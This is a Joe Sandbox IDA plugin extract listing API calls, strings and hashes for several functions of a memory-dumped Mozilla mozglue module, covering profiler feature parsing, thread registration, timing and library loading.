Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: 94b76636f99ffd07114a4f151aec59dcb6d2598d60fa7d4b3905766af542c8f8
Instruction ID: b3b9cb022db72f0e9f9477c7989f80cbda05744432ed32d297e3daa30a732aad
Opcode Fuzzy Hash: 94b76636f99ffd07114a4f151aec59dcb6d2598d60fa7d4b3905766af542c8f8
Instruction Fuzzy Hash: 965169707113235BDB009F36CD84A663AF8AB4A785F114925AA21F3A55EFB0F811CF6D

Function 6C69CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C66582D), ref: 6C69CC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C66582D), ref: 6C69CC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C6CFE98,?,?,?,?,?,6C66582D), ref: 6C69CC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C66582D), ref: 6C69CC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C66582D), ref: 6C69CC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C66582D), ref: 6C69CC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C66582D), ref: 6C69CCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C69CCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C69CCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C69CCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C69CCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C69CD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C69CD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C69CD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C69CDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C69CDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C69CDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C69CDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C69CE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C69CE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C69CE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C69CE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C69CE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C69CE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C69CE8A

Strings

stackwalk, xrefs: 6C69CCF8
java, xrefs: 6C69CC37
unregisteredthreads, xrefs: 6C69CE58
preferencereads, xrefs: 6C69CD92
default, xrefs: 6C69CC21
seqstyle, xrefs: 6C69CCE6
fileioall, xrefs: 6C69CCA8
cpuallthreads, xrefs: 6C69CE16
Unrecognized feature "%s"., xrefs: 6C69CEA0
jsallocations, xrefs: 6C69CD0E
power, xrefs: 6C69CE84
samplingallthreads, xrefs: 6C69CE2C
ipcmessages, xrefs: 6C69CDBE
mainthreadio, xrefs: 6C69CC7C
leaf, xrefs: 6C69CC66
audiocallbacktracing, xrefs: 6C69CDD4
nostacksampling, xrefs: 6C69CD7C
screenshots, xrefs: 6C69CCD4
fileio, xrefs: 6C69CC92
noiostacks, xrefs: 6C69CCBE
processcpu, xrefs: 6C69CE6E
notimerresolutionchange, xrefs: 6C69CE00
nativeallocations, xrefs: 6C69CDA8
markersallthreads, xrefs: 6C69CE42

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: 602cefd0f958e7c68f7242adeed9a91ecb3ecbc503f71a6bb229bb2c15ae9e18
Instruction ID: 86e23dd8be6c638818287a695d03abbef18e979f159a2decd0edf4e43f665e4b
Opcode Fuzzy Hash: 602cefd0f958e7c68f7242adeed9a91ecb3ecbc503f71a6bb229bb2c15ae9e18
Instruction Fuzzy Hash: D05142D1B4562772FA0531156D20BEA1485EF5334AF14443AEE1BA2E90FB05E70FCAAF

Function 6C664470 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C664730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C6644B2,6C6DE21C,6C6DF7F8), ref: 6C66473E
Part of subcall function 6C664730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C66474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C6644BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C6644D2
InitOnceExecuteOnce.KERNEL32(6C6DF80C,6C65F240,?,?), ref: 6C66451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C66455C
LoadLibraryW.KERNEL32(?), ref: 6C664592
InitializeCriticalSection.KERNEL32(6C6DF770), ref: 6C6645A2
moz_xmalloc.MOZGLUE(00000008), ref: 6C6645AA
moz_xmalloc.MOZGLUE(00000018), ref: 6C6645BB
InitOnceExecuteOnce.KERNEL32(6C6DF818,6C65F240,?,?), ref: 6C664612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C664636
LoadLibraryW.KERNEL32(user32.dll), ref: 6C664644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C66466D
VerSetConditionMask.NTDLL ref: 6C66469F
VerSetConditionMask.NTDLL ref: 6C6646AB
VerSetConditionMask.NTDLL ref: 6C6646B2
VerSetConditionMask.NTDLL ref: 6C6646B9
VerSetConditionMask.NTDLL ref: 6C6646C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6646CD
GetModuleHandleW.KERNEL32(00000000), ref: 6C6646F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C6646FD

Strings

l, xrefs: 6C664578
kernel32.dll, xrefs: 6C6644CD
user32.dll, xrefs: 6C664557, 6C66463F
WRusr.dll, xrefs: 6C6644B5
Gml, xrefs: 6C6644FC
NativeNtBlockSet_Write, xrefs: 6C6646F7

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: Gml$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-884719140
Opcode ID: 7f36ea0ce7a6cd817d4207c682ef3097cf320b583f35835c022c5327a6ca0a1b
Instruction ID: eab5048da82757be091df25168019b24db7482201df077dfba6ea1edc53506d4
Opcode Fuzzy Hash: 7f36ea0ce7a6cd817d4207c682ef3097cf320b583f35835c022c5327a6ca0a1b
Instruction Fuzzy Hash: AE6106B0604244AFEB00DF63D895BA57BB8EF86348F04C458E5049BA41D7F1AA85CF9F

Function 6C69F6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
Part of subcall function 6C699420: __Init_thread_footer.LIBCMT ref: 6C69949F

GetCurrentThreadId.KERNEL32 ref: 6C69F70E
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C69F8F9

Part of subcall function 6C666390: GetCurrentThreadId.KERNEL32 ref: 6C6663D0
Part of subcall function 6C666390: AcquireSRWLockExclusive.KERNEL32 ref: 6C6663DF
Part of subcall function 6C666390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C66640E

ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69F93A
GetCurrentThreadId.KERNEL32 ref: 6C69F98A
GetCurrentThreadId.KERNEL32 ref: 6C69F990
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C69F994
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C69F716

Part of subcall function 6C6994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6994EE
Part of subcall function 6C6994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C699508

Part of subcall function 6C65B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C65B5E0

GetCurrentThreadId.KERNEL32 ref: 6C69F739
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69F746
GetCurrentThreadId.KERNEL32 ref: 6C69F793
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C6D385B,00000002,?,?,?,?,?), ref: 6C69F829
free.MOZGLUE(?,?,00000000,?), ref: 6C69F84C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C69F866
free.MOZGLUE(?), ref: 6C69FA0C

Part of subcall function 6C665E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6655E1), ref: 6C665E8C
Part of subcall function 6C665E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C665E9D
Part of subcall function 6C665E60: GetCurrentThreadId.KERNEL32 ref: 6C665EAB
Part of subcall function 6C665E60: GetCurrentThreadId.KERNEL32 ref: 6C665EB8
Part of subcall function 6C665E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C665ECF
Part of subcall function 6C665E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C665F27
Part of subcall function 6C665E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C665F47
Part of subcall function 6C665E60: GetCurrentProcess.KERNEL32 ref: 6C665F53
Part of subcall function 6C665E60: GetCurrentThread.KERNEL32 ref: 6C665F5C
Part of subcall function 6C665E60: GetCurrentProcess.KERNEL32 ref: 6C665F66
Part of subcall function 6C665E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C665F7E

free.MOZGLUE(?), ref: 6C69F9C5
free.MOZGLUE(?), ref: 6C69F9DA

Strings

Thread , xrefs: 6C69F789
[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C69F9A6
" attempted to re-register as ", xrefs: 6C69F858
[D %d/%d] profiler_register_thread(%s), xrefs: 6C69F71F

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
API String ID: 882766088-1834255612
Opcode ID: b1212e13894a61565bf873e0a71522ff3f24380dbdd5ad14f6d00f76d55e6a09
Instruction ID: ac30982e706685506d0b69bd6c31d6219e903b9dfed3c3e8203c429b5339d853
Opcode Fuzzy Hash: b1212e13894a61565bf873e0a71522ff3f24380dbdd5ad14f6d00f76d55e6a09
Instruction Fuzzy Hash: 908106716042019FDB10DF25C880AAEB7B5EFC6308F55456DE8499BB51EB30E849CBAF

Function 6C69EE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
Part of subcall function 6C699420: __Init_thread_footer.LIBCMT ref: 6C69949F

GetCurrentThreadId.KERNEL32 ref: 6C69EE60
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69EE6D
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69EE92
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C69EEA5
CloseHandle.KERNEL32(?), ref: 6C69EEB4
free.MOZGLUE(00000000), ref: 6C69EEBB
GetCurrentThreadId.KERNEL32 ref: 6C69EEC7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C69EECF

Part of subcall function 6C69DE60: GetCurrentThreadId.KERNEL32 ref: 6C69DE73
Part of subcall function 6C69DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C664A68), ref: 6C69DE7B
Part of subcall function 6C69DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C664A68), ref: 6C69DEB8
Part of subcall function 6C69DE60: free.MOZGLUE(00000000,?,6C664A68), ref: 6C69DEFE
Part of subcall function 6C69DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C69DF38

Part of subcall function 6C68CBE8: GetCurrentProcess.KERNEL32(?,6C6531A7), ref: 6C68CBF1
Part of subcall function 6C68CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6531A7), ref: 6C68CBFA

GetCurrentThreadId.KERNEL32 ref: 6C69EF1E
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69EF2B
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69EF59
GetCurrentThreadId.KERNEL32 ref: 6C69EFB0
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69EFBD
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69EFE1
GetCurrentThreadId.KERNEL32 ref: 6C69EFF8
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C69F000

Part of subcall function 6C6994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6994EE
Part of subcall function 6C6994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C699508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C69F02F

Part of subcall function 6C69F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C69F09B
Part of subcall function 6C69F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C69F0AC
Part of subcall function 6C69F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C69F0BE

Strings

[I %d/%d] profiler_stop, xrefs: 6C69EED7
[I %d/%d] profiler_pause, xrefs: 6C69F008

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
API String ID: 16519850-1833026159
Opcode ID: 50cf38773bf96c03438fd58e1a0dbcecab98bc745bc5edc233a6154d42347645
Instruction ID: 54bae6752647e8a262a5c2443303edca6c75c1bed4f4c2427930dd117207f867
Opcode Fuzzy Hash: 50cf38773bf96c03438fd58e1a0dbcecab98bc745bc5edc233a6154d42347645
Instruction Fuzzy Hash: EC5126316002129FDB005F66D8887A97BB4FF8B36DF14456AE91683B42DB747805CBAF

Function 6C665E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C665E9D

Part of subcall function 6C675B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6756EE,?,00000001), ref: 6C675B85
Part of subcall function 6C675B50: EnterCriticalSection.KERNEL32(6C6DF688,?,?,?,6C6756EE,?,00000001), ref: 6C675B90
Part of subcall function 6C675B50: LeaveCriticalSection.KERNEL32(6C6DF688,?,?,?,6C6756EE,?,00000001), ref: 6C675BD8
Part of subcall function 6C675B50: GetTickCount64.KERNEL32 ref: 6C675BE4

GetCurrentThreadId.KERNEL32 ref: 6C665EAB
GetCurrentThreadId.KERNEL32 ref: 6C665EB8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C665ECF
memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C666017

Part of subcall function 6C654310: moz_xmalloc.MOZGLUE(00000010,?,6C6542D2), ref: 6C65436A
Part of subcall function 6C654310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C6542D2), ref: 6C654387

moz_xmalloc.MOZGLUE(00000004), ref: 6C665F47
GetCurrentProcess.KERNEL32 ref: 6C665F53
GetCurrentThread.KERNEL32 ref: 6C665F5C
GetCurrentProcess.KERNEL32 ref: 6C665F66
DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C665F7E
moz_xmalloc.MOZGLUE(00000024), ref: 6C665F27

Part of subcall function 6C66CA10: mozalloc_abort.MOZGLUE(?), ref: 6C66CAA2

moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6655E1), ref: 6C665E8C

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6655E1), ref: 6C66605D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6655E1), ref: 6C6660CC

Strings

GeckoMain, xrefs: 6C665ECE, 6C666015

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
String ID: GeckoMain
API String ID: 3711609982-966795396
Opcode ID: 211275ea6b9994ee602de484c5dd006bb7ae7fee4f0c774230fc7d995417a863
Instruction ID: 2cd89fd41bcb337c7bb41e7ff879147b1e396609699be3e1535cb98365efdae5
Opcode Fuzzy Hash: 211275ea6b9994ee602de484c5dd006bb7ae7fee4f0c774230fc7d995417a863
Instruction Fuzzy Hash: 6371BFB06047409FD710DF2AD480A6ABBF0FF8A304F54496DE58687F52D731E948CB9A

Function 6C669590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6531C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C653217
Part of subcall function 6C6531C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C653236
Part of subcall function 6C6531C0: FreeLibrary.KERNEL32 ref: 6C65324B
Part of subcall function 6C6531C0: __Init_thread_footer.LIBCMT ref: 6C653260
Part of subcall function 6C6531C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C65327F
Part of subcall function 6C6531C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C65328E
Part of subcall function 6C6531C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6532AB
Part of subcall function 6C6531C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6532D1
Part of subcall function 6C6531C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C6532E5
Part of subcall function 6C6531C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C6532F7

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C669675
__Init_thread_footer.LIBCMT ref: 6C669697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C6696E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C669707
__Init_thread_footer.LIBCMT ref: 6C66971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C669773
GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C6697B7
FreeLibrary.KERNEL32 ref: 6C6697D0
FreeLibrary.KERNEL32 ref: 6C6697EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C669824

Strings

MapViewOfFileNuma2, xrefs: 6C6697B1
ntdll.dll, xrefs: 6C6696E3
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C669670
NtMapViewOfSection, xrefs: 6C669701

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 3361784254-3880535382
Opcode ID: fd55bb060ca324fad644d0592b8733138f23f4a485bfe4bfee0cdb20c0154ef6
Instruction ID: 99e33e289692ab79beea46c92a1b769f038b8cec121decf90c14e6842b775f47
Opcode Fuzzy Hash: fd55bb060ca324fad644d0592b8733138f23f4a485bfe4bfee0cdb20c0154ef6
Instruction Fuzzy Hash: AF61B0716002069BDF008F67E8D4BDA7BB1EB8A358F118529ED1597B80D770B854CBAF

Function 6C6B6660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6C6DF618), ref: 6C6B6694
GetThreadId.KERNEL32(?), ref: 6C6B66B1
GetCurrentThreadId.KERNEL32 ref: 6C6B66B9
memset.VCRUNTIME140(?,00000000,00000100), ref: 6C6B66E1
EnterCriticalSection.KERNEL32(6C6DF618), ref: 6C6B6734
GetCurrentProcess.KERNEL32 ref: 6C6B673A
LeaveCriticalSection.KERNEL32(6C6DF618), ref: 6C6B676C
GetCurrentThread.KERNEL32 ref: 6C6B67FC
memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C6B6868
RtlCaptureContext.NTDLL ref: 6C6B687F

Strings

WalkStack64, xrefs: 6C6B6890

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
